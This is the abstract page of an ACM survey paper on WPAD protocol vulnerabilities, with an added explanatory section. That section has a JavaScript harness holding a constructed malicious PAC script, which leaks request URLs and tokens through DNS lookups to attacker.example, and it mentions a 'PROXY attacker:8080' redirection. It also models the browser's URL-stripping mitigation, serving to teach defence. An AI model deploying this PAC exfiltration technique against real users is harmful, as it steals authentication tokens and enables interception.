WPAD: Waiting Patiently for an Announced Disaster

Published: 2 February 2023

Abstract

The Web Proxy Auto-Discovery protocol (wpad) is widely used despite being flawed. Its purpose is to let a client machine autonomously identify an appropriate proxy, if any, to connect through; this is useful in corporate networks, for example. Its vulnerabilities range from enabling an attacker to execute code remotely on client machines, to carrying out SSL MITM attacks, subverting Windows NTLM authentication, or even stealing Google authentication tokens. Several publications, talks, and blog posts have tried to raise awareness about some of these security issues, and 23 distinct CVEs have been published. Nevertheless, wpad runs by default on Windows machines, and most users are unaware of its existence. Our goal is to offer, within a single publication, a survey of all the known vulnerabilities surrounding wpad, a presentation of some novel threats related to this protocol, and a description of mitigation and detection techniques to prevent the exploitation of its vulnerabilities. We hope that this publication will be an eye-opener for all those concerned with the security of their networks, and that the offered mitigation techniques will help them deal with the numerous threats that wpad brings to their environments.
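The abstract names token theft and SSL MITM among the consequences of a hostile proxy configuration. The example below, added here and not taken from the paper, shows the primitive behind the token-theft case: a PAC file is ordinary JavaScript, the browser hands its FindProxyForURL() the full request URL, and the script can push that URL out through the dnsResolve() helper to a name server the attacker controls. It also shows the counter-measure that Firefox (from version 51) and Chromium adopted, stripping path and query from https:// URLs before the PAC script sees them; stripForPac() is our reimplementation of that idea for illustration, not browser code. The domain attacker.example, the token SECRET123, and the helper names are constructed for this example.

```javascript
// Added example, not part of the paper: a small harness that evaluates a PAC
// script the way a browser does, to show why the URL handed to
// FindProxyForURL() is sensitive and how stripping it blunts the leak.
// Names (attacker.example, SECRET123, helper names) are constructed here.

// A PAC file is plain JavaScript. The browser calls FindProxyForURL(url, host)
// for every request and exposes helpers such as dnsResolve(). This constructed
// malicious PAC hex-encodes the full URL into DNS labels and resolves them
// under a domain whose authoritative name server the attacker runs, so that
// server's query log receives the URL, including any query-string token.
const MALICIOUS_PAC = `
function FindProxyForURL(url, host) {
  var hex = "";
  for (var i = 0; i < url.length; i++) {
    hex += ("0" + url.charCodeAt(i).toString(16)).slice(-2);
  }
  var labels = [];
  for (var j = 0; j < hex.length; j += 60) {   // stay under the 63-byte label limit
    labels.push(hex.slice(j, j + 60));
  }
  dnsResolve(labels.join(".") + ".attacker.example");
  return "DIRECT";                              // looks harmless: no proxy at all
}`;

// Compile a PAC source into a callable, giving it only the helpers we pass in.
// new Function() is used so the script cannot see this file's own variables,
// roughly mirroring the separate scope a browser gives PAC code.
function loadPac(pacSource, helpers) {
  const names = Object.keys(helpers);
  const factory = new Function(...names, pacSource + "\nreturn FindProxyForURL;");
  return factory(...names.map((n) => helpers[n]));
}

// Mitigation modelled on what Firefox 51 and Chromium ship (our own
// reimplementation): for https:// URLs hand the PAC script only scheme and host.
function stripForPac(url) {
  const u = new URL(url);
  if (u.protocol !== "https:") return url;      // http:// is cleartext anyway
  return `${u.protocol}//${u.host}/`;
}

// Reverse the encoding above, i.e. what the attacker's DNS server would do.
function decodeLeak(name) {
  const hex = name.replace(/\.attacker\.example$/, "").split(".").join("");
  let out = "";
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// Run one request through the PAC script. The dnsResolve mock records every
// name the script resolves, standing in for the attacker's query log.
function evaluatePac(pacSource, url, stripHttps) {
  const lookups = [];
  const helpers = {
    dnsResolve: (name) => { lookups.push(name); return "203.0.113.10"; }, // TEST-NET-3
  };
  const findProxyForURL = loadPac(pacSource, helpers);
  const seen = stripHttps ? stripForPac(url) : url;
  const proxy = findProxyForURL(seen, new URL(seen).hostname);
  return { proxy, lookups, leaked: lookups.length ? decodeLeak(lookups[0]) : null };
}

// Constructed request carrying a bearer token in the query string.
const REQUEST = "https://accounts.example/oauth?access_token=SECRET123";

// Unpatched behaviour: the whole URL, token included, reaches attacker DNS.
console.log(evaluatePac(MALICIOUS_PAC, REQUEST, false).leaked);
// With stripping: only "https://accounts.example/" leaves the browser.
console.log(evaluatePac(MALICIOUS_PAC, REQUEST, true).leaked);
```

Two caveats a practitioner should keep in mind. Stripping protects only the path and query of https:// requests; the hostname of every request is still visible to the PAC script, and http:// URLs are passed through untouched. More importantly, stripping does nothing against the other attack the abstract lists: a PAC script that returns "PROXY attacker:8080" instead of "DIRECT" steers all traffic through an attacker's proxy, which is the SSL MITM and NTLM-relay case. Where no proxy is needed, disabling auto-detection on the client remains the stronger control.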



Published in

ACM Computing Surveys, Volume 55, Issue 10 (October 2023), 772 pages
ISSN: 0360-0300
EISSN: 1557-7341
DOI: 10.1145/3567475


Publisher

Association for Computing Machinery, New York, NY, United States

Publication History

• Published: 2 February 2023
• Online AM: 7 October 2022
• Accepted: 21 September 2022
• Revised: 2 August 2022
• Received: 13 December 2021

Qualifiers

• survey
• Refereed